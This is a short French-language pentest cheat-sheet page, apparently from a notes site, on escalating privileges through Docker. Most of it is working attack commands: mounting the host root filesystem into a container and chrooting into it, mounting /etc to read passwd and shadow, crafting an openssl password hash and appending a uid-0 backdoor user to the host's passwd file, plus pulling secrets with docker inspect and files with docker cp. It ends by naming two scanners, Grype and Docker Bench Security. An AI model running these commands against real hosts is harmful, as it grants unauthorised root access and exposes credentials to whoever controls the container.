⛴️Docker
Privesc
Privesc rapide
docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
Privesc par création d'un nouveau utilisateur
Un attaquant peut tenter une élévation de privilèges en montant le fichier etc à la recherche des fichier passwd, shadow ou ssh-key.
docker run -v /etc/:/mnt -it <debian>
cd /mnt
cat passwd
Si on a accès au fichier shadow, on peut tenter de cracker les hash de mot de passe et si on a directement accès au fichier passwd alors on peut tout simplement ajouter son propre utilisateur a privilèges.
Pour ceci on va d'abord créer l'utilisateur comme ceci:
openssl passwd -1 -salt <username>
Password:
$1$<username>$...
Puis on va l'ajouter au fichier passwd comme ceci:
docker run -v /etc/:/mnt/ -it <debian>
cd /mnt
echo '<username>:<saltpasswd>:0:0::/root:/bin/bash' >> passwd
tall passwd
su <username>
id
Recherche de secrets
docker inspect <docker_id>
Extraire un fichier
docker cp <docket_id>:/etc/<file> <file>
Outils
Grype
Grype est Un scanner de vulnérabilité pour les images de conteneurs et les systèmes de fichiers.
ressource: https://github.com/anchore/grype
Docker Bench Security
Docker bench security est un script bash permettant d'automatiser les contrôles du CIS benchmark docker.
Dernière mise à jour
Cet article vous a-t-il été utile ?